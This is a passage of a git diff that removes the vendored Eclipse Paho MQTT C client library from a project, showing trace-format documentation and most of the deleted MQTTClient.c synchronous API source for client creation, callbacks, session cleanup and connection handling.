-    20130528 160447.479 (1152206656)    (3)> Socket_new:599
-    20130528 160447.479 New socket 4 for localhost, port 1883
-    20130528 160447.479 (1152206656)     (4)> Socket_addSocket:163
-    20130528 160447.479 (1152206656)      (5)> Socket_setnonblocking:73
-    20130528 160447.479 (1152206656)      (5)< Socket_setnonblocking:78 (0)
-    20130528 160447.479 (1152206656)     (4)< Socket_addSocket:176 (0)
-    20130528 160447.479 (1152206656)     (4)> Socket_error:95
-    20130528 160447.479 (1152206656)     (4)< Socket_error:104 (115)
-    20130528 160447.479 Connect pending
-    20130528 160447.479 (1152206656)    (3)< Socket_new:683 (115)
-    20130528 160447.479 (1152206656)   (2)< MQTTProtocol_connect:131 (115)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. thread id
-  * 4. function nesting level
-  * 5. function entry (>) or exit (<)
-  * 6. function name : line of source code file
-  * 7. return value (if there is one)
-  *
-  * ### Memory Allocation Tracing
-  *
-  * Setting the trace level to maximum causes memory allocations and frees to be traced along with
-  * the default trace entries, with messages like the following:
-  * @code
-    20130528 161819.657 Allocating 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 177 ptr 0x179f930
-
-    20130528 161819.657 Freeing 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 201, heap use now 896 bytes
-  * @endcode
-  * When the last MQTT client object is destroyed, if the trace is being recorded
-  * and all memory allocated by the client library has not been freed, an error message will be
-  * written to the trace.  This can help with fixing memory leaks.  The message will look like this:
-  * @code
-    20130528 163909.208 Some memory not freed at shutdown, possible memory leak
-    20130528 163909.208 Heap scan start, total 880 bytes
-    20130528 163909.208 Heap element size 32, line 354, file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c, ptr 0x260cb00
-    20130528 163909.208   Content
-    20130528 163909.209 Heap scan end
-  * @endcode
-  * @endcond
-  */
-
-
-#endif
-
-#ifdef __cplusplus
-     }
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClient.c b/thirdparty/paho.mqtt.c/src/MQTTClient.c
deleted file mode 100644
index abeaab0..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClient.c
+++ /dev/null
@@ -1,2102 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - bug 384016 - segv setting will message
- *    Ian Craggs - bug 384053 - v1.0.0.7 - stop MQTTClient_receive on socket error
- *    Ian Craggs, Allan Stockdill-Mander - add ability to connect with SSL
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 421103 - trying to write to same socket, in publish/retries
- *    Ian Craggs - fix for bug 419233 - mutexes not reporting errors
- *    Ian Craggs - fix for bug 420851
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - fix for bug 438176 - MQTT version selection
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 443724 - stack corruption
- *    Ian Craggs - fix for bug 447672 - simultaneous access to socket structure
- *    Ian Craggs - fix for bug 459791 - deadlock in WaitForCompletion for bad client
- *    Ian Craggs - fix for bug 474905 - insufficient synchronization for subscribe, unsubscribe, connect
- *    Ian Craggs - make it clear that yield and receive are not intended for multi-threaded mode (bug 474748)
- *    Ian Craggs - SNI support, message queue unpersist bug
- *    Ian Craggs - binary will message support
- *    Ian Craggs - waitforCompletion fix #240
- *******************************************************************************/
-
-/**
- * @file
- * \brief Synchronous API implementation
- *
- */
-
-#define _GNU_SOURCE /* for pthread_mutexattr_settype */
-#include <stdlib.h>
-#include <string.h>
-#if !defined(WIN32) && !defined(WIN64)
-	#include <sys/time.h>
-#endif
-
-#include "MQTTClient.h"
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-
-#include "utf-8.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolOut.h"
-#include "Thread.h"
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-#if defined(OPENSSL)
-#include <openssl/ssl.h>
-#else
-#define URI_SSL "ssl://"
-#endif
-
-#include "OsWrapper.h"
-
-#define URI_TCP "tcp://"
-
-#include "VersionInfo.h"
-
-
-const char *client_timestamp_eye = "MQTTClientV3_Timestamp " BUILD_TIMESTAMP;
-const char *client_version_eye = "MQTTClientV3_Version " CLIENT_VERSION;
-
-void MQTTClient_global_init(MQTTClient_init_options* inits)
-{
-#if defined(OPENSSL)
-	SSLSocket_handleOpensslInit(inits->do_openssl_init);
-#endif
-}
-
-static ClientStates ClientState =
-{
-	CLIENT_VERSION, /* version */
-	NULL /* client list */
-};
-
-ClientStates* bstate = &ClientState;
-
-MQTTProtocol state;
-
-#if defined(WIN32) || defined(WIN64)
-static mutex_type mqttclient_mutex = NULL;
-static mutex_type socket_mutex = NULL;
-static mutex_type subscribe_mutex = NULL;
-static mutex_type unsubscribe_mutex = NULL;
-static mutex_type connect_mutex = NULL;
-extern mutex_type stack_mutex;
-extern mutex_type heap_mutex;
-extern mutex_type log_mutex;
-BOOL APIENTRY DllMain(HANDLE hModule,
-					  DWORD  ul_reason_for_call,
-					  LPVOID lpReserved)
-{
-	switch (ul_reason_for_call)
-	{
-		case DLL_PROCESS_ATTACH:
-			Log(TRACE_MAX, -1, "DLL process attach");
-			if (mqttclient_mutex == NULL)
-			{
-				mqttclient_mutex = CreateMutex(NULL, 0, NULL);
-				subscribe_mutex = CreateMutex(NULL, 0, NULL);
-				unsubscribe_mutex = CreateMutex(NULL, 0, NULL);
-				connect_mutex = CreateMutex(NULL, 0, NULL);
-				stack_mutex = CreateMutex(NULL, 0, NULL);
-				heap_mutex = CreateMutex(NULL, 0, NULL);
-				log_mutex = CreateMutex(NULL, 0, NULL);
-				socket_mutex = CreateMutex(NULL, 0, NULL);
-			}
-		case DLL_THREAD_ATTACH:
-			Log(TRACE_MAX, -1, "DLL thread attach");
-		case DLL_THREAD_DETACH:
-			Log(TRACE_MAX, -1, "DLL thread detach");
-		case DLL_PROCESS_DETACH:
-			Log(TRACE_MAX, -1, "DLL process detach");
-	}
-	return TRUE;
-}
-#else
-static pthread_mutex_t mqttclient_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttclient_mutex = &mqttclient_mutex_store;
-
-static pthread_mutex_t socket_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type socket_mutex = &socket_mutex_store;
-
-static pthread_mutex_t subscribe_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type subscribe_mutex = &subscribe_mutex_store;
-
-static pthread_mutex_t unsubscribe_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type unsubscribe_mutex = &unsubscribe_mutex_store;
-
-static pthread_mutex_t connect_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type connect_mutex = &connect_mutex_store;
-
-void MQTTClient_init(void)
-{
-	pthread_mutexattr_t attr;
-	int rc;
-
-	pthread_mutexattr_init(&attr);
-#if !defined(_WRS_KERNEL)
-	pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK);
-#else
-	/* #warning "no pthread_mutexattr_settype" */
-#endif /* !defined(_WRS_KERNEL) */
-	if ((rc = pthread_mutex_init(mqttclient_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing client_mutex\n", rc);
-	if ((rc = pthread_mutex_init(socket_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing socket_mutex\n", rc);
-	if ((rc = pthread_mutex_init(subscribe_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing subscribe_mutex\n", rc);
-	if ((rc = pthread_mutex_init(unsubscribe_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing unsubscribe_mutex\n", rc);
-	if ((rc = pthread_mutex_init(connect_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing connect_mutex\n", rc);
-}
-
-#define WINAPI
-#endif
-
-static volatile int initialized = 0;
-static List* handles = NULL;
-static int running = 0;
-static int tostop = 0;
-static thread_id_type run_id = 0;
-
-typedef struct
-{
-	MQTTClient_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} qEntry;
-
-
-typedef struct
-{
-	char* serverURI;
-#if defined(OPENSSL)
-	int ssl;
-#endif
-	Clients* c;
-	MQTTClient_connectionLost* cl;
-	MQTTClient_messageArrived* ma;
-	MQTTClient_deliveryComplete* dc;
-	void* context;
-
-	sem_type connect_sem;
-	int rc; /* getsockopt return code in connect */
-	sem_type connack_sem;
-	sem_type suback_sem;
-	sem_type unsuback_sem;
-	MQTTPacket* pack;
-
-} MQTTClients;
-
-void MQTTClient_sleep(long milliseconds)
-{
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	Sleep(milliseconds);
-#else
-	usleep(milliseconds*1000);
-#endif
-	FUNC_EXIT;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-#define START_TIME_TYPE DWORD
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	return GetTickCount();
-}
-#elif defined(AIX)
-#define START_TIME_TYPE struct timespec
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	static struct timespec start;
-	clock_gettime(CLOCK_REALTIME, &start);
-	return start;
-}
-#else
-#define START_TIME_TYPE struct timeval
-START_TIME_TYPE MQTTClient_start_clock(void)
-{
-	static struct timeval start;
-	gettimeofday(&start, NULL);
-	return start;
-}
-#endif
-
-
-#if defined(WIN32) || defined(WIN64)
-long MQTTClient_elapsed(DWORD milliseconds)
-{
-	return GetTickCount() - milliseconds;
-}
-#elif defined(AIX)
-#define assert(a)
-long MQTTClient_elapsed(struct timespec start)
-{
-	struct timespec now, res;
-
-	clock_gettime(CLOCK_REALTIME, &now);
-	ntimersub(now, start, res);
-	return (res.tv_sec)*1000L + (res.tv_nsec)/1000000L;
-}
-#else
-long MQTTClient_elapsed(struct timeval start)
-{
-	struct timeval now, res;
-
-	gettimeofday(&now, NULL);
-	timersub(&now, &start, &res);
-	return (res.tv_sec)*1000 + (res.tv_usec)/1000;
-}
-#endif
-
-static void MQTTClient_terminate(void);
-static void MQTTClient_emptyMessageQueue(Clients* client);
-static int MQTTClient_deliverMessage(
-		int rc, MQTTClients* m,
-		char** topicName, int* topicLen,
-		MQTTClient_message** message);
-static int clientSockCompare(void* a, void* b);
-static thread_return_type WINAPI connectionLost_call(void* context);
-static thread_return_type WINAPI MQTTClient_run(void* n);
-static void MQTTClient_stop(void);
-static void MQTTClient_closeSession(Clients* client);
-static int MQTTClient_cleanSession(Clients* client);
-static int MQTTClient_connectURIVersion(
-	MQTTClient handle, MQTTClient_connectOptions* options,
-	const char* serverURI, int MQTTVersion,
-	START_TIME_TYPE start, long millisecsTimeout);
-static int MQTTClient_connectURI(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI);
-static int MQTTClient_disconnect1(MQTTClient handle, int timeout, int internal, int stop);
-static int MQTTClient_disconnect_internal(MQTTClient handle, int timeout);
-static void MQTTClient_retry(void);
-static MQTTPacket* MQTTClient_cycle(int* sock, unsigned long timeout, int* rc);
-static MQTTPacket* MQTTClient_waitfor(MQTTClient handle, int packet_type, int* rc, long timeout);
-/*static int pubCompare(void* a, void* b); */
-static void MQTTProtocol_checkPendingWrites(void);
-static void MQTTClient_writeComplete(int socket);
-
-
-int MQTTClient_create(MQTTClient* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context)
-{
-	int rc = 0;
-	MQTTClients *m = NULL;
-
-	FUNC_ENTRY;
-	rc = Thread_lock_mutex(mqttclient_mutex);
-
-	if (serverURI == NULL || clientId == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (!UTF8_validateString(clientId))
-	{
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (!initialized)
-	{
-		#if defined(HEAP_H)
-			Heap_initialize();
-		#endif
-		Log_initialize((Log_nameValue*)MQTTClient_getVersionInfo());
-		bstate->clients = ListInitialize();
-		Socket_outInitialize();
-		Socket_setWriteCompleteCallback(MQTTClient_writeComplete);
-		handles = ListInitialize();
-#if defined(OPENSSL)
-		SSLSocket_initialize();
-#endif
-		initialized = 1;
-	}
-	m = malloc(sizeof(MQTTClients));
-	*handle = m;
-	memset(m, '\0', sizeof(MQTTClients));
-	if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-		serverURI += strlen(URI_TCP);
-	else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-	{
-#if defined(OPENSSL)
-		serverURI += strlen(URI_SSL);
-		m->ssl = 1;
-#else
-        rc = MQTTCLIENT_SSL_NOT_SUPPORTED;
-        goto exit;
-#endif
-	}
-	m->serverURI = MQTTStrdup(serverURI);
-	ListAppend(handles, m, sizeof(MQTTClients));
-
-	m->c = malloc(sizeof(Clients));
-	memset(m->c, '\0', sizeof(Clients));
-	m->c->context = m;
-	m->c->outboundMsgs = ListInitialize();
-	m->c->inboundMsgs = ListInitialize();
-	m->c->messageQueue = ListInitialize();
-	m->c->clientID = MQTTStrdup(clientId);
-	m->connect_sem = Thread_create_sem();
-	m->connack_sem = Thread_create_sem();
-	m->suback_sem = Thread_create_sem();
-	m->unsuback_sem = Thread_create_sem();
-
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_create(&(m->c->persistence), persistence_type, persistence_context);
-	if (rc == 0)
-	{
-		rc = MQTTPersistence_initialize(m->c, m->serverURI);
-		if (rc == 0)
-			MQTTPersistence_restoreMessageQueue(m->c);
-	}
-#endif
-	ListAppend(bstate->clients, m->c, sizeof(Clients) + 3*sizeof(List));
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_terminate(void)
-{
-	FUNC_ENTRY;
-	MQTTClient_stop();
-	if (initialized)
-	{
-		ListFree(bstate->clients);
-		ListFree(handles);
-		handles = NULL;
-		Socket_outTerminate();
-#if defined(OPENSSL)
-		SSLSocket_terminate();
-#endif
-		#if defined(HEAP_H)
-			Heap_terminate();
-		#endif
-		Log_terminate();
-		initialized = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTClient_emptyMessageQueue(Clients* client)
-{
-	FUNC_ENTRY;
-	/* empty message queue */
-	if (client->messageQueue->count > 0)
-	{
-		ListElement* current = NULL;
-		while (ListNextElement(client->messageQueue, &current))
-		{
-			qEntry* qe = (qEntry*)(current->content);
-			free(qe->topicName);
-			free(qe->msg->payload);
-			free(qe->msg);
-		}
-		ListEmpty(client->messageQueue);
-	}
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_destroy(MQTTClient* handle)
-{
-	MQTTClients* m = *handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL)
-		goto exit;
-
-	if (m->c)
-	{
-		int saved_socket = m->c->net.socket;
-		char* saved_clientid = MQTTStrdup(m->c->clientID);
-#if !defined(NO_PERSISTENCE)
-		MQTTPersistence_close(m->c);
-#endif
-		MQTTClient_emptyMessageQueue(m->c);
-		MQTTProtocol_freeClient(m->c);
-		if (!ListRemove(bstate->clients, m->c))
-			Log(LOG_ERROR, 0, NULL);
-		else
-			Log(TRACE_MIN, 1, NULL, saved_clientid, saved_socket);
-		free(saved_clientid);
-	}
-	if (m->serverURI)
-		free(m->serverURI);
-	Thread_destroy_sem(m->connect_sem);
-	Thread_destroy_sem(m->connack_sem);
-	Thread_destroy_sem(m->suback_sem);
-	Thread_destroy_sem(m->unsuback_sem);
-	if (!ListRemove(handles, m))
-		Log(LOG_ERROR, -1, "free error");
-	*handle = NULL;
-	if (bstate->clients->count == 0)
-		MQTTClient_terminate();
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_freeMessage(MQTTClient_message** message)
-{
-	FUNC_ENTRY;
-	free((*message)->payload);
-	free(*message);
-	*message = NULL;
-	FUNC_EXIT;
-}
-
-
-void MQTTClient_free(void* memory)
-{
-	FUNC_ENTRY;
-	free(memory);
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_deliverMessage(int rc, MQTTClients* m, char** topicName, int* topicLen, MQTTClient_message** message)
-{
-	qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-
-	FUNC_ENTRY;
-	*message = qe->msg;
-	*topicName = qe->topicName;
-	*topicLen = qe->topicLen;
-	if (strlen(*topicName) != *topicLen)
-		rc = MQTTCLIENT_TOPICNAME_TRUNCATED;
-#if !defined(NO_PERSISTENCE)
-	if (m->c->persistence)
-		MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-#endif
-	ListRemove(m->c->messageQueue, m->c->messageQueue->first->content);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-static int clientSockCompare(void* a, void* b)
-{
-	MQTTClients* m = (MQTTClients*)a;
-	return m->c->net.socket == *(int*)b;
-}
-
-
-/**
- * Wrapper function to call connection lost on a separate thread.  A separate thread is needed to allow the
- * connectionLost function to make API calls (e.g. connect)
- * @param context a pointer to the relevant client
- * @return thread_return_type standard thread return value - not used here
- */
-static thread_return_type WINAPI connectionLost_call(void* context)
-{
-	MQTTClients* m = (MQTTClients*)context;
-
-	(*(m->cl))(m->context, NULL);
-	return 0;
-}
-
-
-/* This is the thread function that handles the calling of callback functions if set */
-static thread_return_type WINAPI MQTTClient_run(void* n)
-{
-	long timeout = 10L; /* first time in we have a small timeout.  Gets things started more quickly */
-
-	FUNC_ENTRY;
-	running = 1;
-	run_id = Thread_getid();
-
-	Thread_lock_mutex(mqttclient_mutex);
-	while (!tostop)
-	{
-		int rc = SOCKET_ERROR;
-		int sock = -1;
-		MQTTClients* m = NULL;
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_cycle(&sock, timeout, &rc);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (tostop)
-			break;
-		timeout = 1000L;
-
-		/* find client corresponding to socket */
-		if (ListFindItem(handles, &sock, clientSockCompare) == NULL)
-		{
-			/* assert: should not happen */
-			continue;
-		}
-		m = (MQTTClient)(handles->current->content);
-		if (m == NULL)
-		{
-			/* assert: should not happen */
-			continue;
-		}
-		if (rc == SOCKET_ERROR)
-		{
-			if (m->c->connected)
-				MQTTClient_disconnect_internal(m, 0);
-			else
-			{
-				if (m->c->connect_state == 2 && !Thread_check_sem(m->connect_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connect semaphore for client %s", m->c->clientID);
-					Thread_post_sem(m->connect_sem);
-				}
-				if (m->c->connect_state == 3 && !Thread_check_sem(m->connack_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connack semaphore for client %s", m->c->clientID);
-					Thread_post_sem(m->connack_sem);
-				}
-			}
-		}
-		else
-		{
-			if (m->c->messageQueue->count > 0)
-			{
-				qEntry* qe = (qEntry*)(m->c->messageQueue->first->content);
-				int topicLen = qe->topicLen;
-
-				if (strlen(qe->topicName) == topicLen)
-					topicLen = 0;
-
-				Log(TRACE_MIN, -1, "Calling messageArrived for client %s, queue depth %d",
-					m->c->clientID, m->c->messageQueue->count);
-				Thread_unlock_mutex(mqttclient_mutex);
-				rc = (*(m->ma))(m->context, qe->topicName, topicLen, qe->msg);
-				Thread_lock_mutex(mqttclient_mutex);
-				/* if 0 (false) is returned by the callback then it failed, so we don't remove the message from
-				 * the queue, and it will be retried later.  If 1 is returned then the message data may have been freed,
-				 * so we must be careful how we use it.
-				 */
-				if (rc)
-				{
-					#if !defined(NO_PERSISTENCE)
-					if (m->c->persistence)
-						MQTTPersistence_unpersistQueueEntry(m->c, (MQTTPersistence_qEntry*)qe);
-					#endif
-					ListRemove(m->c->messageQueue, qe);
-				}
-				else
-					Log(TRACE_MIN, -1, "False returned from messageArrived for client %s, message remains on queue",
-						m->c->clientID);
-			}
-			if (pack)
-			{
-				if (pack->header.bits.type == CONNACK && !Thread_check_sem(m->connack_sem))
-				{
-					Log(TRACE_MIN, -1, "Posting connack semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->connack_sem);
-				}
-				else if (pack->header.bits.type == SUBACK)
-				{
-					Log(TRACE_MIN, -1, "Posting suback semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->suback_sem);
-				}
-				else if (pack->header.bits.type == UNSUBACK)
-				{
-					Log(TRACE_MIN, -1, "Posting unsuback semaphore for client %s", m->c->clientID);
-					m->pack = pack;
-					Thread_post_sem(m->unsuback_sem);
-				}
-			}
-			else if (m->c->connect_state == 1 && !Thread_check_sem(m->connect_sem))
-			{
-				int error;
-				socklen_t len = sizeof(error);
-
-				if ((m->rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-					m->rc = error;
-				Log(TRACE_MIN, -1, "Posting connect semaphore for client %s rc %d", m->c->clientID, m->rc);
-				Thread_post_sem(m->connect_sem);
-			}
-#if defined(OPENSSL)
-			else if (m->c->connect_state == 2 && !Thread_check_sem(m->connect_sem))
-			{
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == 1 || rc == SSL_FATAL)
-				{
-					if (rc == 1 && !m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-					m->rc = rc;
-					Log(TRACE_MIN, -1, "Posting connect semaphore for SSL client %s rc %d", m->c->clientID, m->rc);
-					Thread_post_sem(m->connect_sem);
-				}
-			}
-#endif
-		}
-	}
-	run_id = 0;
-	running = tostop = 0;
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT;
-	return 0;
-}
-
-
-static void MQTTClient_stop(void)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (running == 1 && tostop == 0)
-	{
-		int conn_count = 0;
-		ListElement* current = NULL;
-
-		if (handles != NULL)
-		{
-			/* find out how many handles are still connected */
-			while (ListNextElement(handles, &current))
-			{
-				if (((MQTTClients*)(current->content))->c->connect_state > 0 ||
-						((MQTTClients*)(current->content))->c->connected)
-					++conn_count;
-			}
-		}
-		Log(TRACE_MIN, -1, "Conn_count is %d", conn_count);
-		/* stop the background thread, if we are the last one to be using it */
-		if (conn_count == 0)
-		{
-			int count = 0;
-			tostop = 1;
-			if (Thread_getid() != run_id)
-			{
-				while (running && ++count < 100)
-				{
-					Thread_unlock_mutex(mqttclient_mutex);
-					Log(TRACE_MIN, -1, "sleeping");
-					MQTTClient_sleep(100L);
-					Thread_lock_mutex(mqttclient_mutex);
-				}
-			}
-			rc = 1;
-		}
-	}
-	FUNC_EXIT_RC(rc);
-}
-
-
-int MQTTClient_setCallbacks(MQTTClient handle, void* context, MQTTClient_connectionLost* cl,
-														MQTTClient_messageArrived* ma, MQTTClient_deliveryComplete* dc)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || ma == NULL || m->c->connect_state != 0)
-		rc = MQTTCLIENT_FAILURE;
-	else
-	{
-		m->context = context;
-		m->cl = cl;
-		m->ma = ma;
-		m->dc = dc;
-	}
-
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_closeSession(Clients* client)
-{
-	FUNC_ENTRY;
-	client->good = 0;
-	client->ping_outstanding = 0;
-	if (client->net.socket > 0)
-	{
-		if (client->connected)
-			MQTTPacket_send_disconnect(&client->net, client->clientID);
-		Thread_lock_mutex(socket_mutex);
-#if defined(OPENSSL)
-		SSLSocket_close(&client->net);
-#endif
-		Socket_close(client->net.socket);
-		Thread_unlock_mutex(socket_mutex);
-		client->net.socket = 0;
-#if defined(OPENSSL)
-		client->net.ssl = NULL;
-#endif
-	}
-	client->connected = 0;
-	client->connect_state = 0;
-
-	if (client->cleansession)
-		MQTTClient_cleanSession(client);
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_cleanSession(Clients* client)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_clear(client);
-#endif
-	MQTTProtocol_emptyMessageList(client->inboundMsgs);
-	MQTTProtocol_emptyMessageList(client->outboundMsgs);
-	MQTTClient_emptyMessageQueue(client);
-	client->msgID = 0;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-void Protocol_processPublication(Publish* publish, Clients* client)
-{
-	qEntry* qe = NULL;
-	MQTTClient_message* mm = NULL;
-
-	FUNC_ENTRY;
-	qe = malloc(sizeof(qEntry));
-	mm = malloc(sizeof(MQTTClient_message));
-
-	qe->msg = mm;
-
-	qe->topicName = publish->topic;
-	qe->topicLen = publish->topiclen;
-	publish->topic = NULL;
-
-	/* If the message is QoS 2, then we have already stored the incoming payload
-	 * in an allocated buffer, so we don't need to copy again.
-	 */
-	if (publish->header.bits.qos == 2)
-		mm->payload = publish->payload;
-	else
-	{
-		mm->payload = malloc(publish->payloadlen);
-		memcpy(mm->payload, publish->payload, publish->payloadlen);
-	}
-
-	mm->payloadlen = publish->payloadlen;
-	mm->qos = publish->header.bits.qos;
-	mm->retained = publish->header.bits.retain;
-	if (publish->header.bits.qos == 2)
-		mm->dup = 0;  /* ensure that a QoS2 message is not passed to the application with dup = 1 */
-	else
-		mm->dup = publish->header.bits.dup;
-	mm->msgid = publish->msgId;
-
-	ListAppend(client->messageQueue, qe, sizeof(qe) + sizeof(mm) + mm->payloadlen + strlen(qe->topicName)+1);
-#if !defined(NO_PERSISTENCE)
-	if (client->persistence)
-		MQTTPersistence_persistQueueEntry(client, (MQTTPersistence_qEntry*)qe);
-#endif
-	FUNC_EXIT;
-}
-
-
-static int MQTTClient_connectURIVersion(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI, int MQTTVersion,
-	START_TIME_TYPE start, long millisecsTimeout)
-{
-	MQTTClients* m = handle;
-	int rc = SOCKET_ERROR;
-	int sessionPresent = 0;
-
-	FUNC_ENTRY;
-	if (m->ma && !running)
-	{
-		Thread_start(MQTTClient_run, handle);
-		if (MQTTClient_elapsed(start) >= millisecsTimeout)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-		MQTTClient_sleep(100L);
-	}
-
-	Log(TRACE_MIN, -1, "Connecting to serverURI %s with MQTT version %d", serverURI, MQTTVersion);
-#if defined(OPENSSL)
-	rc = MQTTProtocol_connect(serverURI, m->c, m->ssl, MQTTVersion);
-#else
-	rc = MQTTProtocol_connect(serverURI, m->c, MQTTVersion);
-#endif
-	if (rc == SOCKET_ERROR)
-		goto exit;
-
-	if (m->c->connect_state == 0)
-	{
-		rc = SOCKET_ERROR;
-		goto exit;
-	}
-
-	if (m->c->connect_state == 1) /* TCP connect started - wait for completion */
-	{
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_waitfor(handle, CONNECT, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc != 0)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-
-#if defined(OPENSSL)
-		if (m->ssl)
-		{
-			int port;
-			char* hostname;
-			int setSocketForSSLrc = 0;
-
-			hostname = MQTTProtocol_addressPort(m->serverURI, &port);
-			setSocketForSSLrc = SSLSocket_setSocketForSSL(&m->c->net, m->c->sslopts, hostname);
-			if (hostname != m->serverURI)
-				free(hostname);
-
-			if (setSocketForSSLrc != MQTTCLIENT_SUCCESS)
-			{
-				if (m->c->session != NULL)
-					if ((rc = SSL_set_session(m->c->net.ssl, m->c->session)) != 1)
-						Log(TRACE_MIN, -1, "Failed to set SSL session with stored data, non critical");
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-					m->c->connect_state = 2;  /* the connect is still in progress */
-				else if (rc == SSL_FATAL)
-				{
-					rc = SOCKET_ERROR;
-					goto exit;
-				}
-				else if (rc == 1)
-				{
-					rc = MQTTCLIENT_SUCCESS;
-					m->c->connect_state = 3;
-					if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-					{
-						rc = SOCKET_ERROR;
-						goto exit;
-					}
-					if (!m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-				}
-			}
-			else
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-		}
-		else
-		{
-#endif
-			m->c->connect_state = 3; /* TCP connect completed, in which case send the MQTT connect packet */
-			if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-#if defined(OPENSSL)
-		}
-#endif
-	}
-
-#if defined(OPENSSL)
-	if (m->c->connect_state == 2) /* SSL connect sent - wait for completion */
-	{
-		Thread_unlock_mutex(mqttclient_mutex);
